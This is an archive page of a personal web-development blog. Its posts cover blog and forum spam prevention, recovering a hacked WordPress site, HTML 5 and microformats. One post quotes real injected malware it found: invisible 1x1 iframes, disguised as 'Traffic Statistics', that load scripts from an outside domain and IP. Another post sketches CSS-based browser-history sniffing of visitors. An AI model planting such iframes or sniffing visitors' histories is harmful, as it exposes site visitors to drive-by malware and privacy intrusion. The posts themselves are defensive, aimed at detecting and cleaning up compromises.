Posts Tagged ‘web-development’

How to keep spam off your blog, bulletin board, or forum

Thursday, July 17th, 2008

Spam: it’s not just for breakfast and email anymore.  Webspam is a huge problem. If you run a blog or a forum, you’re probably familiar with the gobs and gobs of gibberish being posted all over the web by spammers.

This humble blog, which only gets a few hundred visitors per day, has had over 17,000 spam comments since I moved over to WordPress last year.  Having your site inundated with comment spam can be just as big a headache as getting hacked.  No one wants to spend hours every day sorting the good posts from the bad.  I’ve already written about how to totally clear out a spammed forum and erase all traces of its reputation-marring existence, but the best solution is prevention.

Here are some steps you can take to help prevent spam on your blog or forum.

Keeping Spam off Your Blog

This section assumes you’re hosting your own blog and can add plugins and make configuration changes. My examples will be WordPress-heavy because that’s the platform I’m most familiar with.

Option 1:  Close or restrict comments. Most blogs give you some options to restrict who can comment on articles.  In WordPress, you can require that users create accounts to comment under Settings -> General.  This might not help too much, since I’ve seen hundreds of automated user accounts created right alongside the spam.

You can also require that comments are approved before they appear - in WordPress, look under Settings -> Discussion.  This will stop your blog from being graffitied without your knowledge, but it also requires manual effort.  You can also disallow trackbacks and pingbacks, which are really cool in theory but a major avenue for automated spam.

You can also shut down comments completely, or disable comments on old posts.  At that point you may be throwing the baby out with the bathwater, but it’s certainly effective.

Option 2:  Make sure commenters are real people with a captcha. Even if you’re not familiar with the term, you’re familiar with captchas.  They’re the little widgets at the end of a form where you have to decipher some scrambled text from an image.  Many blogs have captcha options built in, but if you’re looking for a captcha plugin be sure to balance usability with security.

I’ve used the Did You Pass Math plugin with some success.  Jeff Atwood has used an extremely simple captcha for years on his high-traffic blog.  reCAPTCHA is a really cool project that helps fight automatic posting and helps digitize old books at the same time.
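To give a feel for how little is involved in a simple arithmetic captcha, here is a rough sketch in Python. It is not the code of any plugin mentioned above, and the function names make_question and check_answer are made up for the example.

```python
import random


def make_question(rng=random):
    """Return a (question_text, expected_answer) pair for a simple sum."""
    a = rng.randint(1, 9)
    b = rng.randint(1, 9)
    return f"What is {a} + {b}?", a + b


def check_answer(submitted, expected):
    """Accept the comment only if the visitor typed the right number."""
    try:
        return int(submitted.strip()) == expected
    except (ValueError, AttributeError):
        # Empty, non-numeric, or missing input fails the check.
        return False
```

In a real comment form the expected answer would have to be kept on the server (in the session, say) rather than in a hidden field, or a bot could simply read it back.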

Option 3:  Use an automatic filtering system. If you’re using WordPress, I have three words for you:  Akismet, Akismet, Akismet! Seriously, Akismet is so good at automatically marking spammy comments and trackbacks that it’s almost scary.  If you’re not using WordPress, you may still be able to find an Akismet plugin for your blogging platform.  There are other systems worth trying as well, such as Spam Karma, but I have less experience with those.

Keeping Spam off Your Forum

Again, I’m assuming you are hosting the forum yourself or can otherwise make config changes.  I’ll use phpBB (version 3) as an example because I’ve used it in the past.

Option 1:  Restrict user accounts. This can be a tough call, because when you start a forum you want to make it as easy as possible for people to join in the discussion.  Unfortunately, allowing anyone to register and begin posting without any admin approval also opens the door for spammers.

In phpBB this setting can be found in the Administration Control Panel under Board Configuration -> User Registration Settings.

Option 2:  Again with the captchas. Captchas aren’t 100 percent guaranteed to remove spam but they do help.  If your forum software doesn’t have a captcha or a captcha plugin, I would seriously consider upgrading to a version that does or switching forums completely.  I know it’s a huge pain, but waking up one morning to find 10,000 spam posts is even worse.

In phpBB3 look under Board Configuration -> User Registration Settings for a setting called “Enable visual confirmation for registrations” and make sure it’s turned on.  You can change the details under Board Configuration -> Visual confirmation settings.

Option 3:  Try to find an automatic filtering system. This is harder than for blogs.  There was an Akismet phpBB mod but it’s apparently not being maintained.  There’s a workaround involving the Spam Words mod that you can read about here.  The Spam Words mod might be worth trying on its own too.  Here’s a thread with more options for phpBB2; search around and find what’s available for your forum software.
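If nothing ready-made exists for your forum, the basic idea behind a word-list filter is easy to sketch. The Python below is only an illustration of the approach, not how the Spam Words mod actually works. The word list, the link threshold, and the name looks_spammy are all assumptions of mine.

```python
import re

# Hypothetical word list; a real one would be tuned to the spam you actually see.
SPAM_WORDS = {"viagra", "casino", "payday"}


def looks_spammy(text, spam_words=SPAM_WORDS, max_links=3):
    """Flag a post that contains a listed word or an unusual number of links."""
    words = set(re.findall(r"[a-z0-9']+", text.lower()))
    if words & set(spam_words):
        return True
    # Assumption: more than max_links URLs in one post is suspicious.
    return len(re.findall(r"https?://", text, flags=re.IGNORECASE)) > max_links
```

A filter like this is better used to hold posts for moderation than to delete them outright, since any word list will catch some legitimate posts.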

Even without automated filtering, you can try to slow down the spammers by setting a time limit between posts (most human beings don’t type as quickly as spambots do).  Other options, such as disallowing links and BBCode, are pretty drastic but might make your forum less enticing to spammers.
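The time limit between posts is simple enough to sketch. This is a minimal Python illustration of the idea, not phpBB’s implementation. The class name PostThrottle and the 30-second default are assumptions for the example.

```python
import time


class PostThrottle:
    """Reject posts that arrive too soon after the same user's previous post."""

    def __init__(self, min_seconds=30, clock=time.monotonic):
        self.min_seconds = min_seconds
        self.clock = clock
        self.last_post = {}  # user id -> time of last accepted post

    def allow(self, user_id):
        now = self.clock()
        previous = self.last_post.get(user_id)
        if previous is not None and now - previous < self.min_seconds:
            return False
        self.last_post[user_id] = now
        return True
```

The clock is passed in so the behavior can be checked without actually waiting. In a real forum the timestamps would live in the database rather than in memory.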

Just for fun:

Spam, spam, bacon, and Spam

Sphere: Related Content

Great video on how to get your site back in Google

Friday, July 4th, 2008

Earlier I wrote a bit about what to do when your site has been hacked or spammed to the point where Google and Firefox start warning visitors away from your site.  If you find your site deleted from Google search results completely, you’ll want to file a reconsideration request.

Luckily, the Google Webmaster Central blog has a great post on how to make a request to get back into Google.  The post includes a step-by-step video.  You can also check out the Google Webmaster Help group if you have questions.


An interesting use of Greasemonkey - Troubleshooting other people’s sites

Wednesday, June 11th, 2008

I’ve played around with Firefox’s Greasemonkey add-on here and there but never really delved into it until recently.  I found most of the common uses for it to be either too specific to someone else’s use habits or already covered by other extensions.  For example, there are probably a million ad blocking scripts out there, but I already have Adblock.

I’ve grown to appreciate Greasemonkey a lot more since I learned that you can make AJAX calls in scripts - now we can do some real damage.  But this post is not about that, it’s about a totally different use case that I hadn’t thought of before.

If you’re a web developer with any friends or family you’ve probably heard this one before:

“Something’s wrong with my web site, can you take a look?”

Often, though, you won’t have access to a dev server, database, or even a copy of the server-side code.  All you can see is the HTML and Javascript source and the HTTP transactions going back and forth.

Greasemonkey can’t rewrite PHP code on someone else’s server but it does make it really, really easy for you to alter forms, delete and change cookie values, and patch and debug Javascript on the site you’re looking at, without changing any other variables.

This can be really, really useful in some situations.  So now it’s officially added to my volunteer/web-developer/brother-in-law toolbelt.


XHTML 2 vs HTML 5 and the href Attribute

Monday, June 2nd, 2008

I wrote a little earlier about what I was looking forward to in HTML 5.  I haven’t had a chance to really collect my thoughts about XHTML 2 vs HTML 5; to be honest, I’d be happy to see progress on both fronts.  I do have to say I lost interest in XHTML 2 early on, when it seemed they were throwing the baby out with the bathwater.  HTML is not the cleanest, most elegant language, but the ease of picking it up is part of why the web grew so quickly, even if that has forced browsers to cope with millions of pages of clunky, broken HTML.

Eric Meyer has at least one point in XHTML 2’s favor - the ability to add an href attribute to anything, making it a link.  In addition to making the <a> tag jealous, this would let you do some pretty cool stuff like turn an entire table row into a link in a dynamic data reporting web app without a lot of JavaScript or duplicated tags.

By the way Eric is a fellow member of the Cleveland Web Standards Association and a great speaker.  If you get a chance to see a talk by him you should really check it out.


A Scary, but Fascinating Idea - Javascript and CSS hack to see where your users have been

Friday, May 30th, 2008


I just ran across this post on Aza Raskin’s blog about a technique used to cut down the number of social bookmarking links displayed to users.  I’m sure you’ve seen them–the 20 or so colorful buttons that have popped up at the bottom of every blog post on the web, for Digg, Del.icio.us and similar sites.  On my blog they are hidden behind the ShareThis Widget but Raskin had a better idea - why not just display the ones each user actually uses?

Impossible?  Not so fast - think about what happens when you visit a site.  After your visit any links to the site will change, usually from blue to purple.  We can put up links to each social bookmarking site and then use Javascript and CSS to check to see if each link has been visited.  If so, display the button, and if not, hide it.

This is a very cool way to manage buttons but the technique has wider privacy implications.  I could, for example, put links to…  questionable sites, and then use some Ajax to collect that information about users.  If I had other information about you (say you logged into my site or otherwise gave me an email address) I could link it together and build a database.

On the other hand, it’s not like I can grab your entire browsing history or follow you around after you leave my site - I have to specifically create a link and check it for every site I want to know about.  And the check only works for as long as the visit is still in your browser history, so clearing your history resets it.  So it’s not spyware or anything as intrusive as, say, the Alexa toolbar.

I can think of a bunch of cool ways to apply this technique, but I’m not sharing until I implement one.  Feel free to post any ideas (or misgivings) in the comments below.


Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on WordPress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, worse still, your FTP account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all FTP accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in its own right, so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever by serving a 410 (gone). You can do this with any server-side language; my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php
// Tell browsers and spiders that this content is permanently gone.
header("HTTP/1.1 410 Gone");
header("Status: 410 Gone"); ?>

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.
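Since this works in any server-side language, here is roughly what the same idea looks like as a tiny Python WSGI app. It is only a sketch: the /forum/ path is an assumed location for the deleted board, and gone_app is a name I made up.

```python
def gone_app(environ, start_response):
    """Minimal WSGI app: answer 410 Gone under /forum/, 404 elsewhere."""
    path = environ.get("PATH_INFO", "")
    # Assumption: the deleted bulletin board lived under /forum/.
    if path == "/forum" or path.startswith("/forum/"):
        status, body = "410 Gone", b"This content has been removed.\n"
    else:
        status, body = "404 Not Found", b"Not found.\n"
    headers = [("Content-Type", "text/plain; charset=utf-8"),
               ("Content-Length", str(len(body)))]
    start_response(status, headers)
    return [body]
```

For a quick local check you could serve it with make_server from the standard wsgiref.simple_server module and request a forum URL to confirm the 410 status line.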

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /
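Before waiting on the spiders, it can be worth confirming that the rules block what you think they block. This sketch uses Python’s standard urllib.robotparser. The helper name is_blocked and the example.com URLs are placeholders of mine.

```python
from urllib.robotparser import RobotFileParser

ROBOTS_TXT = """\
User-agent: *
Disallow: /forum/
"""


def is_blocked(robots_txt, url, user_agent="*"):
    """Return True if the given robots.txt text tells user_agent to skip url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(user_agent, url)
```

For example, is_blocked(ROBOTS_TXT, "http://example.com/forum/viewtopic.php") should come back True, while a URL elsewhere on the site should come back False.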

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.example.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automatically the way a subdirectory added as a new site would.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.


Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my WordPress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update WordPress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe><br />
<!-- End Traffic Statistics -->

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Anti-Virus warned me about a trojan horse in my temp folder.
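Part of that manual search can be scripted. Here is a rough Python sketch that scans a page’s HTML for iframes sized at 1 pixel or less, like the ones above. It only catches frames hidden by width or height, not ones hidden with CSS. The names TinyIframeFinder and find_hidden_iframes are my own.

```python
from html.parser import HTMLParser


class TinyIframeFinder(HTMLParser):
    """Collect the src of every iframe that is sized to be effectively invisible."""

    def __init__(self, max_size=1):
        super().__init__()
        self.max_size = max_size
        self.suspects = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attrs = dict(attrs)
        if self._tiny(attrs.get("width")) or self._tiny(attrs.get("height")):
            self.suspects.append(attrs.get("src"))

    def _tiny(self, value):
        # Only plain pixel values are handled; "100%" or missing values are ignored.
        return value is not None and value.strip().isdigit() and int(value) <= self.max_size


def find_hidden_iframes(html):
    finder = TinyIframeFinder()
    finder.feed(html)
    return finder.suspects
```

Run it against the rendered source of each page (what the browser receives), since injected code may live in the database or a theme file rather than in the post itself.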

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should add that subdirectory as a new site in Webmaster Tools. Here’s an illustration:

[Screenshot: Google Webmaster Tools listing www.jasonmorrison.net and www.jasonmorrison.net/content as separate sites]

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.com that spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.


What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and a few good comments now and again, but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my site’s good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So StopBadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses WordPress and allows user comments. A bad link could show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.
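If you would rather check a page yourself, listing its outgoing links takes only a few lines. This Python sketch is not how the Bad Neighborhood tool works. It just pulls every link that points at a different host so you can eyeball the list. The names LinkCollector and outgoing_links are made up for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Gather the href of every <a> tag in the page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def outgoing_links(html, own_host):
    """Return the links in html that point at a host other than own_host."""
    collector = LinkCollector()
    collector.feed(html)
    external = []
    for href in collector.hrefs:
        host = urlparse(href).hostname
        # Relative links have no host; subdomains of own_host count as internal.
        if host and host != own_host and not host.endswith("." + own_host):
            external.append(href)
    return external
```

Anything in the result that you don’t remember adding yourself deserves a closer look.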

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness about upgrading WordPress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to hear back on my review; I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.


The Top Ten Best Things About HTML 5

Sunday, December 30th, 2007

The World Wide Web has grown at an astounding pace and is pretty ingrained in a lot of our daily lives - you’re reading it right now. Part of the reason it has been so successful has been the flexibility and ease of use of the basic language of web pages, HTML.

Most web sites are developed in HTML 4 (first released in 1997) or XHTML (from 2000). Considering the rapid change all around the web, why hasn’t there been a new version, and what’s next for the Web? One reason we haven’t seen new versions is the aforementioned flexibility. There have been plenty of developments, from blogging software and other content management systems on the server side to CSS, AJAX, and embedded Flash video on the front end.

Microformats are a part of this and will be a big part of the future too. But all the web developers in the house should get up to speed on HTML 5, which looks to be the future of the Web.

I’ve been watching what the Web Hypertext Application Technology Working Group (WHATWG) has been doing with HTML 5 ever since I took a gander at the W3C’s XHTML 2 spec and figured out that they were mostly adding annoyance and removing backwards compatibility. Guys I respect, like Eric Meyer, seemed to agree. The WHATWG decided to work on their own ideas and came up with HTML 5, which was eventually adopted by the W3C as well.

I haven’t taken a look in a while but Marcia Zeng mentioned the HTML 5 spec in an email recently and it got me interested in checking back in. I have to say, for the most part, it’s looking very interesting.

So I decided to put together a quick list of my top 10 new things in HTML 5:

  1. The <nav> element. This will be great for the billions of navbars we web developers have been coding up for the past 10 years. Things like this will help reduce the problem of div soup and make structure more apparent.
  2. The <header> and <footer> elements. See the last entry and add in the billions of page headers and footers we’ve produced as well. Semantically meaningful tags like these can only help browser plugin writers, search engine programmers, and other hackers to come up with cool new features.
  3. The death of the dreaded <font> tag. This should have been banished as soon as CSS was widely supported. It was a pain in the rear to use back in the 1990s when coding by hand, and was even worse when inserted by GUI tools like FrontPage.
  4. The continued usefulness of the <img> element. You may be wondering how we could make web pages without the image element, but XHTML2 only included it grudgingly, recommending everyone use <object> instead. The problem is that just about anything could be an object, the tag is almost meaningless. Why not replace all tags with <thing>?
  5. The <audio> and <video> elements. There’s been some controversy about this, because the W3C originally recommended use of the open source Ogg formats but later recanted. Still, it will be nice to embed audio and video as easily and consistently as images are used now.
  6. New <input> types for dates, urls, etc. When you have a form that requires a user to input a date or some other specialized data, your choices have been to present a plain text input or jazz things up with JavaScript to make it a bit more usable. HTML 5 adds specific types for these cases.
  7. The contenteditable API. This will be really interesting if it’s fully supported. In Tim Berners-Lee’s original vision for the web, documents would be easily editable. Wikis get us almost there, but a standard editing API would be even better.
  8. A required attribute for form inputs. This won’t mean we can stop checking incoming data on the server side (users can still POST arbitrary data with the right tools) but it should remove the need for millions of little field-checking JavaScripts.
  9. The <figure> and <legend> elements. This will make it a little easier to associate captions and other text to images. Look for CMSs and image search engines to take advantage of these tags.
  10. An open development process. Want to keep an eye on development? Got an idea or concern about the spec? Hop on one of the mailing lists. Open standards are great for promoting compatibility and competition, so open development of the standards just makes sense.


The power of microformats

Monday, December 3rd, 2007

A few months ago I attended a really interesting talk by Eric Meyer where he touched on the use of microformats.  You might know Eric from his excellent O’Reilly Press CSS books.

What are microformats?  Before giving an example, I’ll give a little context.  When Tim Berners-Lee created the web, he tried to make HTML simple, flexible, and meaningful.  He succeeded on the first two counts but the third was quickly left by the wayside - many designers didn’t care what a particular tag meant, so long as it could be used for page layout.  The use of tables to arrange graphic elements instead of holding tabular data is a perfect example.

So Berners-Lee has been talking for years about the next step - the semantic web.  In the semantic web, tags are used to say what a particular piece of content is, with all styling done with stylesheets.  There is, of course, more to the semantic web than just separating content and presentation; after all, you can work that way with HTML and CSS now.  One other key component is the web of trust, where people and web sites are able to describe relationships to each other so that search engines can help you find trustworthy content automatically.

Unfortunately, the semantic web has not really taken off.  There have been lots of meetings and XML schemas but it’s all too complicated, the process is too bureaucratic, and everything is being designed from the top down.

This is where microformats come in.  Let’s say you have a blog and you’ve tagged all your articles.  You’d like to let search engines and aggregators like Technorati know what your tags are.  But HTML doesn’t have anything like this:

<tag>semantic web</tag>

So what do you do?  Simple, use the rel-tag microformat:

<a href="http://example.com/tag/semantic+web" rel="tag">semantic web</a>

The microformat makes use of existing html tags and attributes and just follows simple conventions.  But now that this little bit of meaning can be interpreted by spiders and other programs, we’ve actually added a pretty powerful bit of functionality to the web.
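To show how little a spider needs to do to pick this up, here is a rough Python sketch of a rel-tag reader. As I understand the convention, the tag is the last segment of the link’s URL path (with + standing in for a space) rather than the link text. The names RelTagParser and extract_tags are made up for the example.

```python
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlparse


class RelTagParser(HTMLParser):
    """Collect tags from <a> elements whose rel attribute includes "tag"."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attrs = dict(attrs)
        rel_values = (attrs.get("rel") or "").lower().split()
        href = attrs.get("href")
        if "tag" in rel_values and href:
            # Take the last path segment of the URL and decode "+" and %xx.
            segment = urlparse(href).path.rstrip("/").rsplit("/", 1)[-1]
            self.tags.append(unquote_plus(segment))


def extract_tags(html):
    parser = RelTagParser()
    parser.feed(html)
    return parser.tags
```

Fed the link above, extract_tags gives back a one-item list containing "semantic web".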

Most blog software, including WordPress, does microformatting for you.  If you install my tag cloud plugin, Altocumulous, and view source, you can see for yourself.

For intranet purposes, the hCard and hCalendar microformats look promising.  Take a look at microformats.org to see why I think so.  I’ll write more on it later.


How do you set up a PHP development environment?

Saturday, November 10th, 2007

Are you a budding web developer wondering where to start?  An old hand looking for new tools?  Let me tell you a little bit about how I do my PHP / web development work, and maybe some of it will be of use to you.

I am starting up some work on Mealographer again.  It definitely needs it: I did a usability test about a year ago and still haven’t fixed the issues I uncovered.  I haven’t been doing a lot of work in PHP recently, as my day job is all Java all the time.  I used to be happy with a text editor, a server somewhere and a browser, but since I’ve been using Eclipse I’ve become spoiled by better tools.

So what do you need to get started?  If you just want to play around, all you need is:

A text editor.  You can use Notepad, but I’ve used HTMLKit in the past.  It’s free and it does basic stuff like syntax highlighting nicely.

A server.  You can set everything up on a remote server, many have PHP accounts for as low as $5/month.  Right now I use Site5 [referral link].  I also want to give a shout out to Q5Media, though PHP isn’t their main thing.

A browser.  This is pretty basic, but worth mentioning.  You need Firefox, which is free to download.  You’ll also want to test things in IE, which you probably already have.

You can do real work with just the above.  It’s worth taking advantage of all the great tools out there, though, including:

An integrated development environment (IDE) - I’m pretty happy with Eclipse for Java development (or the related IBM RAD 6).  What about for PHP?  Right now I’m trying to decide between PHPEclipse and the PDT plugin.  Anyone have an opinion on which way to go?

A local development server - If you want to run PHP locally on Windows, you can install Apache or get PHP working on IIS.  In my experience, though, you can’t beat WAMPSERVER - it includes Apache, MySQL and PHP and makes configuration pretty easy.

Source control - There’s no way to keep track of a project of any real size without a change management system.  I have used CVS a lot, and SmartCVS is a good free client.  There are also CVS plugins for Eclipse.  I have heard a lot of good things about Subversion as well.

Web developer plugins for Firefox - seriously, if you don’t have these, you might as well tie one hand behind your back when writing JavaScript or CSS.  Here’s a good list of Firefox plugins.

So that’s what I use - what am I missing?  Post suggestions in the comments below.


Software Comparison: ASP.NET vs PHP

Tuesday, February 17th, 2004

ASP.NET and PHP

Virtually every medium or large web site now uses some kind of server-side scripting to generate web pages and interactive features instead of static HTML. A number of technologies are used for this purpose, including PHP, ASP.NET, Perl, ColdFusion, and JSP. This paper will look at Microsoft’s ASP.NET and an open-source alternative, PHP, and compare them in terms of cost, performance, support, features and ease of use for web development.

 

Comparing ASP and PHP can be difficult because they are not exactly the same class of software. PHP is simply a server-side scripting language. The PHP homepage describes it as “a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.”1 ASP, more properly ASP.NET, is not a language per se, and allows users to program Microsoft Internet Information Services (IIS) in Jscript, Vbscript, and C#, among others. ASP.NET is a little harder to define than PHP. ASP stands for Active Server Pages, and .NET, according to Microsoft, “is a set of Microsoft software technologies for connecting information, people, systems, and devices. It enables a high level of software integration through the use of Web services—small, discrete, building-block applications that connect to each other as well as to other, larger applications over the Internet.”2

 

Despite major structural differences, the two can and should be compared because they can be used to create the same kinds of medium-to-large, dynamic, often database-driven web sites. Server-side scripting allows sites to easily edit and update information, offer interactive features like forums and personalization, and track user traffic.

  (more…)
